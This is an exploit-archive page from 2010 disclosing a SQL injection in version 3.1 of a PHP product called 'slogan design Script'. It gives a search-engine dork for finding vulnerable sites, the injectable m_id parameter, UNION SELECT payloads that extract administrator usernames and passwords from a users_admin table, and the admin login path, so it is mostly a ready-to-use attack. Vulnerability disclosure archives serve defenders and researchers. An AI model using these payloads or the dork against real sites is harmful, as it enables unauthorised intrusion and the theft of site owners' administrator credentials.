ad

slogan design Script SQL Injection Vulnerability



EDB-ID: 12849 CVE: N/A OSVDB-ID: N/A
Author: Mr.P3rfekT Published: 2010-06-03 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Title: slogan design Script SQL Injection Vulnerability
# Version:
3.1
# Author: Mr.P3rfekT
# Software Site:
http://www.slogandesign.co.il
# Tested on Lunix
# CVE : N/A

###############
Founded By Mr.P3rfekT --- We Will Not Go Down ###############

#
Dork : " inurl:"index.php?m_id="

# Helllo Allz.


#
Exploit :

http://[site]/path/index.php?m_id={SQLi}



#
Poc Username:

union select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Poc Password:

union select
1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Demo:

http://[site]/union
select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin

# Admin Login


#
http://[site]/admin/login.php

# ./done.


####################################################################